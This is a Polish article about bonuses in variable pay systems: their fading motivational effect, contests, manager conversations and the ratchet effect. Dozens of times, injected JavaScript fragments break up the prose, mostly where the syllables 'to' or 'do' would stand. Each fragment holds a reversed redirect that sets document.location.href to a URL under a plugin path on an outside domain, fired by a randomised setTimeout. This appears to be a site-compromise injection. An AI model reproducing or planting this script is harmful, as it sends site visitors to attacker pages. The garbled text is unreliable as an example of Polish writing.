Premia toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to składnik zmiennego systemu wynagrodzeń. Jego zmienność polega na tym, że premia ma modyfikować zachowania pracowników, którzy je zmieniają w pogoni za premią.
Dlaczego jednak te zachowania trzeba modyfikować? Gdyż z definicji nie są zgodne z interesem firmy, dla pracownika najważniejszy jest bowiem jego interes osobisty. I płaca, a w szczególności jej zmienny składnik, ma toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zmienić.
Płaca w całości toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie tylko cena pracy, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to także narzędzie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to sterowania zachowaniami. Tu w założeniu najlepiej sprawdzi się premia, która w założeniu ma być wypłacana za coś, na czym firmie zależy.
Uwaga. „płacić za wszystko?” Skoro premia tak skutecznie (w założeniu) zmienia zachowania pracownika na pożądane, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to czemu nie płacić za każde takie zachowanie? Gdyż z jednej strony nastąpi inflacja wynagrodzenia, pracownik sam się zgubi, co i jak ma robić, żeby więcej zarobić. Z drugiej strony wyjdzie za drogo, gdyż pożądanych zachowań jest wiele, a z czasem wciąż będą toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochodzić nowe.
Firma nie powinna jednak zapominać, że nadal wypłaca pensję (stałą część wynagrodzenia) i ta część jest też za coś, z założenia, że wszystkie zachowania pracownika mieszczą się w pożądanej przez firmę normie. To odróżnia ją od premii, która z założenia jest za coś konkretnego.
Premia powinna być za coś konkretnego
Gdyż inaczej staje się stałym składnikiem wynagrodzenia. I toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie tylko konkretnego, ale także
Uwaga. „młodzi menedżerowie myślą, że zmienny system wynagradzania będzie za nich zarządzał”, gdyż sami mają z tym problem. Ale niestety (dla nich) toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tak nie działa. Żeby zmienny system wynagradzania pełnił swoją funkcję, musi być zarządzany, czyli niektórzy pracownicy powinni zarobić, inni nie, a rolą menedżera będzie wyjaśnienie im dlaczego. To jeszcze większe wyzwanie menedżerskie niż zarządzanie bez zmiennego systemu wynagradzania.
Za co może być premia? Może być za cele ilościowe, mierzalne (toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wygodne dla menedżerów), może też być za cele jakościowe, tu jednak trzeba się przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować na trudne rozmowy z pracownikami.
Z czasem motywacyjna funkcja premii i tak wygasa. Zwykle toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobrze działa przez kilka miesięcy, potem pracownicy się przyzwyczajają i traktują jak należny składnik wynagrodzenia.
Utrzymanie motywacyjnej funkcji premii jest trudne
Gdyż trzeba się za każdym razem mierzyć z pracownikami.
Uwaga. „jak działa konkurs?” Działa potoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobnie jak premia, tylko krótkookresowo, czyli tanio. Konkurs polega na tym, że firma wyznacza jakieś zadanie, z założenia mierzalne co toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do wyniku, po czym nagradza tych pracowników, którzy osiągnęli najlepsze wyniki. Tu kluczem jest wzajemna rywalizacja, a fakt, że nagród jest najwyżej kilka. można sobie pozwolić na toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, aby były naprawdę odczuwalne. Konkurs ma dwie cenne dla firmy cechy. Pozwala wprowadzić coś nowego, zachęcając toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do tego pracowników finansowo, ale bez długotrwałych konsekwencji kosztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towych. Po drugie pozwala stwierdzić, jakie jest maksymalny potencjał parametru, gdyż najlepsi na pewno wyśrubują wynik.
Utrzymanie motywacyjnej roli premii zakłada, że nie wszyscy i nie zawsze ją otrzymają. Najlepiej będzie, jeśli np. system jest tak skonstruowany, że każtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorazowo otrzymuje ją najwyżej 50% pracowników. To oczywiście będzie wzbudzać kontrowersje i pojawią się pytania „dlaczego ja nie?”
Nieprzyznanie premii działa wprawdzie motywująco, ale jest bardzo trudne menedżersko, gdyż wymaga zmierzenia się z wątpliwościami pracowników, którzy będą za wszelką cenę utoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowadniać, że system jest niesprawiedliwy i oni też powinni toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dostać. Zmęczeni tym menedżerowie (a większość z nich nie umie sobie radzić z takimi trudnymi rozmowami) wolą już wszystkim dać premię, najlepiej w maksymalnej wysokości.
Uwaga. „zawsze ci sami”. To też problem premii, że zwykle otrzymują ją najlepsi. A że ci są zwykle ci sami, więc kształtuje się z czasem elita, która toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dostaje premię regularnie, a reszta nie ma co na toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to liczyć. Ci się zniechęcają i przestają się starać, co wręcz zaprzecza motywacyjnej roli premii.
Pewnym rozwiązaniem jest wyznaczenie obiektywnych kryteriów, co zwalnia menedżerów z trudnych rozmów, mogą się bowiem oni wtedy zasłonić obiektywnym wynikiem. Ale nie wszystko i nie zawsze da się zmierzyć, poza tym zawsze można podważać wynik, nawet mierzalny.
Najtrudniej jest nie dać, ale odebrać
Z premią wiąże się jeszcze jeden problem, czyli prawo zapadki. W tym prawie chodzi o toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, że jak w mechanizmie zegarowym kółka zębate kręcą się tylko w jedną stronę, pracownicy akceptują tylko podwyżki, za wszelką cenę walcząc o utrzymanie osiągniętego poziomu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochodów. A mają na toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wiele sposobów
Odebranie premii działa jak odebranie części należnego (i oczekiwanego) toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochodu, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do którego pracownik już toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopasował swój poziom wydatków. Dlatego z czasem premia staje się składnikiem stałego wynagrodzenia, nikogo już toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do niczego nie motywując.
Podsumowanie
Premia toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to część zmiennego systemu wynagradzania. Dla słabych czy nietoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doświadczonych menedżerów wydaje się idealnym rozwiązaniem problemu zarządzania, czyli jak sprawić, aby pracownicy robili toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, czego się od nich oczekuje. Jednak toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to iluzja. Premia szybko przestaje kogokolwiek toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do czegokolwiek motywować, pracownicy się przyzwyczajają, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do tego traktują jak coś należnego. Żeby rola motywacyjna utrzymała się dłużej, trzeba tej premii pozbawiać, przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towując się jednocześnie na trudne rozmowy z rozczarowanymi pracownikami.